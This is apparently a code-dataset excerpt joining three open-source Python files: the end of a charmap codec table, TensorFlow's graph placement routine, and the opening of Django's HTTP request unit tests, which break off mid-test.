u'\u2551' # 0x00ba -> BOX DRAWINGS DOUBLE VERTICAL
u'\u2557' # 0x00bb -> BOX DRAWINGS DOUBLE DOWN AND LEFT
u'\u255d' # 0x00bc -> BOX DRAWINGS DOUBLE UP AND LEFT
u'\u255c' # 0x00bd -> BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
u'\u255b' # 0x00be -> BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
u'\u2510' # 0x00bf -> BOX DRAWINGS LIGHT DOWN AND LEFT
u'\u2514' # 0x00c0 -> BOX DRAWINGS LIGHT UP AND RIGHT
u'\u2534' # 0x00c1 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
u'\u252c' # 0x00c2 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
u'\u251c' # 0x00c3 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
u'\u2500' # 0x00c4 -> BOX DRAWINGS LIGHT HORIZONTAL
u'\u253c' # 0x00c5 -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
u'\u255e' # 0x00c6 -> BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
u'\u255f' # 0x00c7 -> BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
u'\u255a' # 0x00c8 -> BOX DRAWINGS DOUBLE UP AND RIGHT
u'\u2554' # 0x00c9 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
u'\u2569' # 0x00ca -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
u'\u2566' # 0x00cb -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
u'\u2560' # 0x00cc -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
u'\u2550' # 0x00cd -> BOX DRAWINGS DOUBLE HORIZONTAL
u'\u256c' # 0x00ce -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
u'\u2567' # 0x00cf -> BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
u'\u2568' # 0x00d0 -> BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
u'\u2564' # 0x00d1 -> BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
u'\u2565' # 0x00d2 -> BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
u'\u2559' # 0x00d3 -> BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
u'\u2558' # 0x00d4 -> BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
u'\u2552' # 0x00d5 -> BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
u'\u2553' # 0x00d6 -> BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
u'\u256b' # 0x00d7 -> BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
u'\u256a' # 0x00d8 -> BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
u'\u2518' # 0x00d9 -> BOX DRAWINGS LIGHT UP AND LEFT
u'\u250c' # 0x00da -> BOX DRAWINGS LIGHT DOWN AND RIGHT
u'\u2588' # 0x00db -> FULL BLOCK
u'\u2584' # 0x00dc -> LOWER HALF BLOCK
u'\u258c' # 0x00dd -> LEFT HALF BLOCK
u'\u2590' # 0x00de -> RIGHT HALF BLOCK
u'\u2580' # 0x00df -> UPPER HALF BLOCK
u'\u03b1' # 0x00e0 -> GREEK SMALL LETTER ALPHA
u'\xdf' # 0x00e1 -> LATIN SMALL LETTER SHARP S
u'\u0393' # 0x00e2 -> GREEK CAPITAL LETTER GAMMA
u'\u03c0' # 0x00e3 -> GREEK SMALL LETTER PI
u'\u03a3' # 0x00e4 -> GREEK CAPITAL LETTER SIGMA
u'\u03c3' # 0x00e5 -> GREEK SMALL LETTER SIGMA
u'\xb5' # 0x00e6 -> MICRO SIGN
u'\u03c4' # 0x00e7 -> GREEK SMALL LETTER TAU
u'\u03a6' # 0x00e8 -> GREEK CAPITAL LETTER PHI
u'\u0398' # 0x00e9 -> GREEK CAPITAL LETTER THETA
u'\u03a9' # 0x00ea -> GREEK CAPITAL LETTER OMEGA
u'\u03b4' # 0x00eb -> GREEK SMALL LETTER DELTA
u'\u221e' # 0x00ec -> INFINITY
u'\u03c6' # 0x00ed -> GREEK SMALL LETTER PHI
u'\u03b5' # 0x00ee -> GREEK SMALL LETTER EPSILON
u'\u2229' # 0x00ef -> INTERSECTION
u'\u2261' # 0x00f0 -> IDENTICAL TO
u'\xb1' # 0x00f1 -> PLUS-MINUS SIGN
u'\u2265' # 0x00f2 -> GREATER-THAN OR EQUAL TO
u'\u2264' # 0x00f3 -> LESS-THAN OR EQUAL TO
u'\u2320' # 0x00f4 -> TOP HALF INTEGRAL
u'\u2321' # 0x00f5 -> BOTTOM HALF INTEGRAL
u'\xf7' # 0x00f6 -> DIVISION SIGN
u'\u2248' # 0x00f7 -> ALMOST EQUAL TO
u'\xb0' # 0x00f8 -> DEGREE SIGN
u'\u2219' # 0x00f9 -> BULLET OPERATOR
u'\xb7' # 0x00fa -> MIDDLE DOT
u'\u221a' # 0x00fb -> SQUARE ROOT
u'\u207f' # 0x00fc -> SUPERSCRIPT LATIN SMALL LETTER N
u'\xb2' # 0x00fd -> SUPERSCRIPT TWO
u'\u25a0' # 0x00fe -> BLACK SQUARE
u'\xa0' # 0x00ff -> NO-BREAK SPACE
)
### Encoding Map
encoding_map = {
0x0000: 0x0000, # NULL
0x0001: 0x0001, # START OF HEADING
0x0002: 0x0002, # START OF TEXT
0x0003: 0x0003, # END OF TEXT
0x0004: 0x0004, # END OF TRANSMISSION
0x0005: 0x0005, # ENQUIRY
0x0006: 0x0006, # ACKNOWLEDGE
0x0007: 0x0007, # BELL
0x0008: 0x0008, # BACKSPACE
0x0009: 0x0009, # HORIZONTAL TABULATION
0x000a: 0x000a, # LINE FEED
0x000b: 0x000b, # VERTICAL TABULATION
0x000c: 0x000c, # FORM FEED
0x000d: 0x000d, # CARRIAGE RETURN
0x000e: 0x000e, # SHIFT OUT
0x000f: 0x000f, # SHIFT IN
0x0010: 0x0010, # DATA LINK ESCAPE
0x0011: 0x0011, # DEVICE CONTROL ONE
0x0012: 0x0012, # DEVICE CONTROL TWO
0x0013: 0x0013, # DEVICE CONTROL THREE
0x0014: 0x0014, # DEVICE CONTROL FOUR
0x0015: 0x0015, # NEGATIVE ACKNOWLEDGE
0x0016: 0x0016, # SYNCHRONOUS IDLE
0x0017: 0x0017, # END OF TRANSMISSION BLOCK
0x0018: 0x0018, # CANCEL
0x0019: 0x0019, # END OF MEDIUM
0x001a: 0x001a, # SUBSTITUTE
0x001b: 0x001b, # ESCAPE
0x001c: 0x001c, # FILE SEPARATOR
0x001d: 0x001d, # GROUP SEPARATOR
0x001e: 0x001e, # RECORD SEPARATOR
0x001f: 0x001f, # UNIT SEPARATOR
0x0020: 0x0020, # SPACE
0x0021: 0x0021, # EXCLAMATION MARK
0x0022: 0x0022, # QUOTATION MARK
0x0023: 0x0023, # NUMBER SIGN
0x0024: 0x0024, # DOLLAR SIGN
0x0025: 0x0025, # PERCENT SIGN
0x0026: 0x0026, # AMPERSAND
0x0027: 0x0027, # APOSTROPHE
0x0028: 0x0028, # LEFT PARENTHESIS
0x0029: 0x0029, # RIGHT PARENTHESIS
0x002a: 0x002a, # ASTERISK
0x002b: 0x002b, # PLUS SIGN
0x002c: 0x002c, # COMMA
0x002d: 0x002d, # HYPHEN-MINUS
0x002e: 0x002e, # FULL STOP
0x002f: 0x002f, # SOLIDUS
0x0030: 0x0030, # DIGIT ZERO
0x0031: 0x0031, # DIGIT ONE
0x0032: 0x0032, # DIGIT TWO
0x0033: 0x0033, # DIGIT THREE
0x0034: 0x0034, # DIGIT FOUR
0x0035: 0x0035, # DIGIT FIVE
0x0036: 0x0036, # DIGIT SIX
0x0037: 0x0037, # DIGIT SEVEN
0x0038: 0x0038, # DIGIT EIGHT
0x0039: 0x0039, # DIGIT NINE
0x003a: 0x003a, # COLON
0x003b: 0x003b, # SEMICOLON
0x003c: 0x003c, # LESS-THAN SIGN
0x003d: 0x003d, # EQUALS SIGN
0x003e: 0x003e, # GREATER-THAN SIGN
0x003f: 0x003f, # QUESTION MARK
0x0040: 0x0040, # COMMERCIAL AT
0x0041: 0x0041, # LATIN CAPITAL LETTER A
0x0042: 0x0042, # LATIN CAPITAL LETTER B
0x0043: 0x0043, # LATIN CAPITAL LETTER C
0x0044: 0x0044, # LATIN CAPITAL LETTER D
0x0045: 0x0045, # LATIN CAPITAL LETTER E
0x0046: 0x0046, # LATIN CAPITAL LETTER F
0x0047: 0x0047, # LATIN CAPITAL LETTER G
0x0048: 0x0048, # LATIN CAPITAL LETTER H
0x0049: 0x0049, # LATIN CAPITAL LETTER I
0x004a: 0x004a, # LATIN CAPITAL LETTER J
0x004b: 0x004b, # LATIN CAPITAL LETTER K
0x004c: 0x004c, # LATIN CAPITAL LETTER L
0x004d: 0x004d, # LATIN CAPITAL LETTER M
0x004e: 0x004e, # LATIN CAPITAL LETTER N
0x004f: 0x004f, # LATIN CAPITAL LETTER O
0x0050: 0x0050, # LATIN CAPITAL LETTER P
0x0051: 0x0051, # LATIN CAPITAL LETTER Q
0x0052: 0x0052, # LATIN CAPITAL LETTER R
0x0053: 0x0053, # LATIN CAPITAL LETTER S
0x0054: 0x0054, # LATIN CAPITAL LETTER T
0x0055: 0x0055, # LATIN CAPITAL LETTER U
0x0056: 0x0056, # LATIN CAPITAL LETTER V
0x0057: 0x0057, # LATIN CAPITAL LETTER W
0x0058: 0x0058, # LATIN CAPITAL LETTER X
0x0059: 0x0059, # LATIN CAPITAL LETTER Y
0x005a: 0x005a, # LATIN CAPITAL LETTER Z
0x005b: 0x005b, # LEFT SQUARE BRACKET
0x005c: 0x005c, # REVERSE SOLIDUS
0x005d: 0x005d, # RIGHT SQUARE BRACKET
0x005e: 0x005e, # CIRCUMFLEX ACCENT
0x005f: 0x005f, # LOW LINE
0x0060: 0x0060, # GRAVE ACCENT
0x0061: 0x0061, # LATIN SMALL LETTER A
0x0062: 0x0062, # LATIN SMALL LETTER B
0x0063: 0x0063, # LATIN SMALL LETTER C
0x0064: 0x0064, # LATIN SMALL LETTER D
0x0065: 0x0065, # LATIN SMALL LETTER E
0x0066: 0x0066, # LATIN SMALL LETTER F
0x0067: 0x0067, # LATIN SMALL LETTER G
0x0068: 0x0068, # LATIN SMALL LETTER H
0x0069: 0x0069, # LATIN SMALL LETTER I
0x006a: 0x006a, # LATIN SMALL LETTER J
0x006b: 0x006b, # LATIN SMALL LETTER K
0x006c: 0x006c, # LATIN SMALL LETTER L
0x006d: 0x006d, # LATIN SMALL LETTER M
0x006e: 0x006e, # LATIN SMALL LETTER N
0x006f: 0x006f, # LATIN SMALL LETTER O
0x0070: 0x0070, # LATIN SMALL LETTER P
0x0071: 0x0071, # LATIN SMALL LETTER Q
0x0072: 0x0072, # LATIN SMALL LETTER R
0x0073: 0x0073, # LATIN SMALL LETTER S
0x0074: 0x0074, # LATIN SMALL LETTER T
0x0075: 0x0075, # LATIN SMALL LETTER U
0x0076: 0x0076, # LATIN SMALL LETTER V
0x0077: 0x0077, # LATIN SMALL LETTER W
0x0078: 0x0078, # LATIN SMALL LETTER X
0x0079: 0x0079, # LATIN SMALL LETTER Y
0x007a: 0x007a, # LATIN SMALL LETTER Z
0x007b: 0x007b, # LEFT CURLY BRACKET
0x007c: 0x007c, # VERTICAL LINE
0x007d: 0x007d, # RIGHT CURLY BRACKET
0x007e: 0x007e, # TILDE
0x007f: 0x007f, # DELETE
0x00a0: 0x00ff, # NO-BREAK SPACE
0x00a1: 0x00ad, # INVERTED EXCLAMATION MARK
0x00a2: 0x009b, # CENT SIGN
0x00a3: 0x009c, # POUND SIGN
0x00aa: 0x00a6, # FEMININE ORDINAL INDICATOR
0x00ab: 0x00ae, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00ac: 0x00aa, # NOT SIGN
0x00b0: 0x00f8, # DEGREE SIGN
0x00b1: 0x00f1, # PLUS-MINUS SIGN
0x00b2: 0x00fd, # SUPERSCRIPT TWO
0x00b5: 0x00e6, # MICRO SIGN
0x00b7: 0x00fa, # MIDDLE DOT
0x00ba: 0x00a7, # MASCULINE ORDINAL INDICATOR
0x00bb: 0x00af, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00bc: 0x00ac, # VULGAR FRACTION ONE QUARTER
0x00bd: 0x00ab, # VULGAR FRACTION ONE HALF
0x00bf: 0x00a8, # INVERTED QUESTION MARK
0x00c0: 0x0091, # LATIN CAPITAL LETTER A WITH GRAVE
0x00c1: 0x0086, # LATIN CAPITAL LETTER A WITH ACUTE
0x00c2: 0x008f, # LATIN CAPITAL LETTER A WITH CIRCUMFLEX
0x00c3: 0x008e, # LATIN CAPITAL LETTER A WITH TILDE
0x00c7: 0x0080, # LATIN CAPITAL LETTER C WITH CEDILLA
0x00c8: 0x0092, # LATIN CAPITAL LETTER E WITH GRAVE
0x00c9: 0x0090, # LATIN CAPITAL LETTER E WITH ACUTE
0x00ca: 0x0089, # LATIN CAPITAL LETTER E WITH CIRCUMFLEX
0x00cc: 0x0098, # LATIN CAPITAL LETTER I WITH GRAVE
0x00cd: 0x008b, # LATIN CAPITAL LETTER I WITH ACUTE
0x00d1: 0x00a5, # LATIN CAPITAL LETTER N WITH TILDE
0x00d2: 0x00a9, # LATIN CAPITAL LETTER O WITH GRAVE
0x00d3: 0x009f, # LATIN CAPITAL LETTER O WITH ACUTE
0x00d4: 0x008c, # LATIN CAPITAL LETTER O WITH CIRCUMFLEX
0x00d5: 0x0099, # LATIN CAPITAL LETTER O WITH TILDE
0x00d9: 0x009d, # LATIN CAPITAL LETTER U WITH GRAVE
0x00da: 0x0096, # LATIN CAPITAL LETTER U WITH ACUTE
0x00dc: 0x009a, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x00df: 0x00e1, # LATIN SMALL LETTER SHARP S
0x00e0: 0x0085, # LATIN SMALL LETTER A WITH GRAVE
0x00e1: 0x00a0, # LATIN SMALL LETTER A WITH ACUTE
0x00e2: 0x0083, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x00e3: 0x0084, # LATIN SMALL LETTER A WITH TILDE
0x00e7: 0x0087, # LATIN SMALL LETTER C WITH CEDILLA
0x00e8: 0x008a, # LATIN SMALL LETTER E WITH GRAVE
0x00e9: 0x0082, # LATIN SMALL LETTER E WITH ACUTE
0x00ea: 0x0088, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x00ec: 0x008d, # LATIN SMALL LETTER I WITH GRAVE
0x00ed: 0x00a1, # LATIN SMALL LETTER I WITH ACUTE
0x00f1: 0x00a4, # LATIN SMALL LETTER N WITH TILDE
0x00f2: 0x0095, # LATIN SMALL LETTER O WITH GRAVE
0x00f3: 0x00a2, # LATIN SMALL LETTER O WITH ACUTE
0x00f4: 0x0093, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x00f5: 0x0094, # LATIN SMALL LETTER O WITH TILDE
0x00f7: 0x00f6, # DIVISION SIGN
0x00f9: 0x0097, # LATIN SMALL LETTER U WITH GRAVE
0x00fa: 0x00a3, # LATIN SMALL LETTER U WITH ACUTE
0x00fc: 0x0081, # LATIN SMALL LETTER U WITH DIAERESIS
0x0393: 0x00e2, # GREEK CAPITAL LETTER GAMMA
0x0398: 0x00e9, # GREEK CAPITAL LETTER THETA
0x03a3: 0x00e4, # GREEK CAPITAL LETTER SIGMA
0x03a6: 0x00e8, # GREEK CAPITAL LETTER PHI
0x03a9: 0x00ea, # GREEK CAPITAL LETTER OMEGA
0x03b1: 0x00e0, # GREEK SMALL LETTER ALPHA
0x03b4: 0x00eb, # GREEK SMALL LETTER DELTA
0x03b5: 0x00ee, # GREEK SMALL LETTER EPSILON
0x03c0: 0x00e3, # GREEK SMALL LETTER PI
0x03c3: 0x00e5, # GREEK SMALL LETTER SIGMA
0x03c4: 0x00e7, # GREEK SMALL LETTER TAU
0x03c6: 0x00ed, # GREEK SMALL LETTER PHI
0x207f: 0x00fc, # SUPERSCRIPT LATIN SMALL LETTER N
0x20a7: 0x009e, # PESETA SIGN
0x2219: 0x00f9, # BULLET OPERATOR
0x221a: 0x00fb, # SQUARE ROOT
0x221e: 0x00ec, # INFINITY
0x2229: 0x00ef, # INTERSECTION
0x2248: 0x00f7, # ALMOST EQUAL TO
0x2261: 0x00f0, # IDENTICAL TO
0x2264: 0x00f3, # LESS-THAN OR EQUAL TO
0x2265: 0x00f2, # GREATER-THAN OR EQUAL TO
0x2320: 0x00f4, # TOP HALF INTEGRAL
0x2321: 0x00f5, # BOTTOM HALF INTEGRAL
0x2500: 0x00c4, # BOX DRAWINGS LIGHT HORIZONTAL
0x2502: 0x00b3, # BOX DRAWINGS LIGHT VERTICAL
0x250c: 0x00da, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x2510: 0x00bf, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x2514: 0x00c0, # BOX DRAWINGS LIGHT UP AND RIGHT
0x2518: 0x00d9, # BOX DRAWINGS LIGHT UP AND LEFT
0x251c: 0x00c3, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x2524: 0x00b4, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x252c: 0x00c2, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x2534: 0x00c1, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x253c: 0x00c5, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x2550: 0x00cd, # BOX DRAWINGS DOUBLE HORIZONTAL
0x2551: 0x00ba, # BOX DRAWINGS DOUBLE VERTICAL
0x2552: 0x00d5, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x2553: 0x00d6, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x2554: 0x00c9, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x2555: 0x00b8, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x2556: 0x00b7, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x2557: 0x00bb, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x2558: 0x00d4, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x2559: 0x00d3, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x255a: 0x00c8, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x255b: 0x00be, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x255c: 0x00bd, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x255d: 0x00bc, # BOX DRAWINGS DOUBLE UP AND LEFT
0x255e: 0x00c6, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x255f: 0x00c7, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x2560: 0x00cc, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x2561: 0x00b5, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x2562: 0x00b6, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x2563: 0x00b9, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x2564: 0x00d1, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x2565: 0x00d2, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x2566: 0x00cb, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x2567: 0x00cf, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x2568: 0x00d0, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x2569: 0x00ca, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x256a: 0x00d8, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x256b: 0x00d7, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x256c: 0x00ce, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x2580: 0x00df, # UPPER HALF BLOCK
0x2584: 0x00dc, # LOWER HALF BLOCK
0x2588: 0x00db, # FULL BLOCK
0x258c: 0x00dd, # LEFT HALF BLOCK
0x2590: 0x00de, # RIGHT HALF BLOCK
0x2591: 0x00b0, # LIGHT SHADE
0x2592: 0x00b1, # MEDIUM SHADE
0x2593: 0x00b2, # DARK SHADE
0x25a0: 0x00fe, # BLACK SQUARE
}
| apache-2.0 |
jart/tensorflow | tensorflow/python/grappler/graph_placer.py | 23 | 4478 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Graph Placer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops as tf_ops
from tensorflow.python.grappler import cluster as gcluster
from tensorflow.python.grappler import hierarchical_controller
from tensorflow.python.grappler import item as gitem
from tensorflow.python.grappler import tf_optimizer
from tensorflow.python.training import training
def PlaceGraph(metagraph,
cluster=None,
allotted_time=3600,
hparams=None,
verbose=False):
"""Place the provided metagraph.
Args:
metagraph: the metagraph to place.
cluster: an optional set of hardware resource to optimize the placement for.
If none is specified, we'll optimize the placement for the hardware
available on the local machine.
allotted_time: the maximum amount to time in seconds to spend optimizing
the placement.
hparams: hyperparameters used to fine tune the placer.
verbose: prints debug information if True.
Returns:
The placed metagraph.
"""
if cluster is None:
cluster = gcluster.Cluster()
# Optimize the metagraph to speedup the placement
rewriter_config = rewriter_config_pb2.RewriterConfig()
optimized_graph = tf_optimizer.OptimizeGraph(
rewriter_config, metagraph, verbose=verbose, cluster=cluster)
optimized_metagraph = meta_graph_pb2.MetaGraphDef()
optimized_metagraph.CopyFrom(metagraph)
optimized_metagraph.graph_def.CopyFrom(optimized_graph)
item = gitem.Item(optimized_metagraph)
# Measure the runtime achievable with the original placement.
try:
_, original_run_time, _ = cluster.MeasureCosts(item)
if verbose:
print("Runtime for original placement: " + str(original_run_time))
except errors.OpError as e:
if verbose:
print("Original placement isn't feasible: " + str(e))
original_run_time = hparams.failing_signal
if hparams is None:
hparams = hierarchical_controller.hierarchical_controller_hparams()
# We run with a single child
hparams.num_children = 1
with tf_ops.Graph().as_default():
# Place all the nodes of the controller on the CPU. We don't want them to
# fight for accelerator memory with the model to optimize.
with tf_ops.device("/device:CPU:0"):
model = hierarchical_controller.HierarchicalController(
hparams, item, cluster)
ops = model.build_controller()
session_creator = training.ChiefSessionCreator()
with training.MonitoredSession(session_creator=session_creator) as sess:
start_time = time.time()
current_time = start_time
while current_time - start_time < allotted_time:
grouping_actions = model.generate_grouping(sess)
input_to_seq2seq = model.create_group_embeddings(
grouping_actions, verbose=verbose)
model.generate_placement(input_to_seq2seq, sess)
try:
run_time = model.eval_placement(
sess,
verbose=verbose)
except errors.OpError as e:
if verbose:
print("Failed to run graph:" + str(e))
run_time = hparams.failing_signal
updated = model.update_reward(sess, run_time, verbose=verbose)
if updated and run_time < original_run_time:
if verbose:
print("Found better placement, with runtime " + str(run_time))
model.export_placement(metagraph)
model.process_reward(sess)
current_time = time.time()
return metagraph
| apache-2.0 |
nzavagli/UnrealPy | UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/django-1.8.2/tests/requests/tests.py | 65 | 34729 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import time
from datetime import datetime, timedelta
from io import BytesIO
from itertools import chain
from django.core.exceptions import SuspiciousOperation
from django.core.handlers.wsgi import LimitedStream, WSGIRequest
from django.http import (
HttpRequest, HttpResponse, RawPostDataException, UnreadablePostError,
build_request_repr, parse_cookie,
)
from django.test import RequestFactory, SimpleTestCase, override_settings
from django.test.client import FakePayload
from django.test.utils import str_prefix
from django.utils import six
from django.utils.encoding import force_str
from django.utils.http import cookie_date, urlencode
from django.utils.six.moves import http_cookies
from django.utils.six.moves.urllib.parse import urlencode as original_urlencode
from django.utils.timezone import utc
class RequestsTests(SimpleTestCase):
def test_httprequest(self):
request = HttpRequest()
self.assertEqual(list(request.GET.keys()), [])
self.assertEqual(list(request.POST.keys()), [])
self.assertEqual(list(request.COOKIES.keys()), [])
self.assertEqual(list(request.META.keys()), [])
# .GET and .POST should be QueryDicts
self.assertEqual(request.GET.urlencode(), '')
self.assertEqual(request.POST.urlencode(), '')
# and FILES should be MultiValueDict
self.assertEqual(request.FILES.getlist('foo'), [])
def test_httprequest_full_path(self):
request = HttpRequest()
request.path = request.path_info = '/;some/?awful/=path/foo:bar/'
request.META['QUERY_STRING'] = ';some=query&+query=string'
expected = '/%3Bsome/%3Fawful/%3Dpath/foo:bar/?;some=query&+query=string'
self.assertEqual(request.get_full_path(), expected)
def test_httprequest_full_path_with_query_string_and_fragment(self):
request = HttpRequest()
request.path = request.path_info = '/foo#bar'
request.META['QUERY_STRING'] = 'baz#quux'
self.assertEqual(request.get_full_path(), '/foo%23bar?baz#quux')
def test_httprequest_repr(self):
request = HttpRequest()
request.path = '/somepath/'
request.method = 'GET'
request.GET = {'get-key': 'get-value'}
request.POST = {'post-key': 'post-value'}
request.COOKIES = {'post-key': 'post-value'}
request.META = {'post-key': 'post-value'}
self.assertEqual(repr(request), str_prefix("<HttpRequest: GET '/somepath/'>"))
self.assertEqual(build_request_repr(request), str_prefix("<HttpRequest\npath:/somepath/,\nGET:{%(_)s'get-key': %(_)s'get-value'},\nPOST:{%(_)s'post-key': %(_)s'post-value'},\nCOOKIES:{%(_)s'post-key': %(_)s'post-value'},\nMETA:{%(_)s'post-key': %(_)s'post-value'}>"))
self.assertEqual(build_request_repr(request, path_override='/otherpath/', GET_override={'a': 'b'}, POST_override={'c': 'd'}, COOKIES_override={'e': 'f'}, META_override={'g': 'h'}),
str_prefix("<HttpRequest\npath:/otherpath/,\nGET:{%(_)s'a': %(_)s'b'},\nPOST:{%(_)s'c': %(_)s'd'},\nCOOKIES:{%(_)s'e': %(_)s'f'},\nMETA:{%(_)s'g': %(_)s'h'}>"))
def test_httprequest_repr_invalid_method_and_path(self):
request = HttpRequest()
self.assertEqual(repr(request), str_prefix("<HttpRequest>"))
request = HttpRequest()
request.method = "GET"
self.assertEqual(repr(request), str_prefix("<HttpRequest>"))
request = HttpRequest()
request.path = ""
self.assertEqual(repr(request), str_prefix("<HttpRequest>"))
def test_bad_httprequest_repr(self):
"""
If an exception occurs when parsing GET, POST, COOKIES, or META, the
repr of the request should show it.
"""
class Bomb(object):
"""An object that raises an exception when printed out."""
def __repr__(self):
raise Exception('boom!')
bomb = Bomb()
for attr in ['GET', 'POST', 'COOKIES', 'META']:
request = HttpRequest()
setattr(request, attr, {'bomb': bomb})
self.assertIn('%s:<could not parse>' % attr, build_request_repr(request))
def test_wsgirequest(self):
request = WSGIRequest({'PATH_INFO': 'bogus', 'REQUEST_METHOD': 'bogus', 'wsgi.input': BytesIO(b'')})
self.assertEqual(list(request.GET.keys()), [])
self.assertEqual(list(request.POST.keys()), [])
self.assertEqual(list(request.COOKIES.keys()), [])
self.assertEqual(set(request.META.keys()), {'PATH_INFO', 'REQUEST_METHOD', 'SCRIPT_NAME', 'wsgi.input'})
self.assertEqual(request.META['PATH_INFO'], 'bogus')
self.assertEqual(request.META['REQUEST_METHOD'], 'bogus')
self.assertEqual(request.META['SCRIPT_NAME'], '')
def test_wsgirequest_with_script_name(self):
"""
Ensure that the request's path is correctly assembled, regardless of
whether or not the SCRIPT_NAME has a trailing slash.
Refs #20169.
"""
# With trailing slash
request = WSGIRequest({'PATH_INFO': '/somepath/', 'SCRIPT_NAME': '/PREFIX/', 'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
self.assertEqual(request.path, '/PREFIX/somepath/')
# Without trailing slash
request = WSGIRequest({'PATH_INFO': '/somepath/', 'SCRIPT_NAME': '/PREFIX', 'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
self.assertEqual(request.path, '/PREFIX/somepath/')
def test_wsgirequest_with_force_script_name(self):
"""
Ensure that the FORCE_SCRIPT_NAME setting takes precedence over the
request's SCRIPT_NAME environment parameter.
Refs #20169.
"""
with override_settings(FORCE_SCRIPT_NAME='/FORCED_PREFIX/'):
request = WSGIRequest({'PATH_INFO': '/somepath/', 'SCRIPT_NAME': '/PREFIX/', 'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
self.assertEqual(request.path, '/FORCED_PREFIX/somepath/')
def test_wsgirequest_path_with_force_script_name_trailing_slash(self):
"""
Ensure that the request's path is correctly assembled, regardless of
whether or not the FORCE_SCRIPT_NAME setting has a trailing slash.
Refs #20169.
"""
# With trailing slash
with override_settings(FORCE_SCRIPT_NAME='/FORCED_PREFIX/'):
request = WSGIRequest({'PATH_INFO': '/somepath/', 'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
self.assertEqual(request.path, '/FORCED_PREFIX/somepath/')
# Without trailing slash
with override_settings(FORCE_SCRIPT_NAME='/FORCED_PREFIX'):
request = WSGIRequest({'PATH_INFO': '/somepath/', 'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
self.assertEqual(request.path, '/FORCED_PREFIX/somepath/')
def test_wsgirequest_repr(self):
